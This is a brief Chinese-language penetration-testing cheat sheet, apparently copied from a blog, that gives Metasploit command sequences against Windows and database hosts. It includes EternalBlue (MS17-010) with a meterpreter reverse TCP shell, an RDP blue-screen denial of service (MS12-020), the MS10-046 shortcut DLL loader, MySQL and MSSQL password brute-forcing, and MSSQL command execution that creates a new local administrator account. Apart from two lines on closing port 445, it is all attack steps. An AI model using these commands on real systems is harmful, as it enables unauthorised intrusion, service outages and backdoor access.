永恒之蓝(ms17-010):
[445端口开启]
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost ip run
防御:
关闭445端口smb服务(网络共享服务)
开启防火墙,设置445端口处的入站规则连接
蓝屏攻击(ms12-020):
[3389端口开启]
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set rhost ip run
文件共享(ms10-046):
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader set srvhost kaliip run
mysql暴力登录:
探测:
use auxiliary/scanner/mysql/mysql_version set rhosts ip run
登录:
use auxiliary/scanner/mysql/mysql_login set rhosts ip set pass_file password.txt set user_file user.txt run
mssql:
查找mssql端口:
use auxiliary/scanner/mssql/mssql_ping set rhost ip run
(也可以用nmap -sV ip,但是效果不行)
mssql暴力破解:
use auxiliary/scanner/mssql/mssql_login set rhost ip set pass_file password.txt set rport x run
mssql命令执行(添加账户):
use auxiliary/admin/mssql/mssql_exec set rhost ip set rport set cmd cmd.exe /c net user test 123 /add run set cmd cmd.exe /c net localgroup administrators test /add run
原文地址:https://www.cnblogs.com/f1veseven/p/13577268.html
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。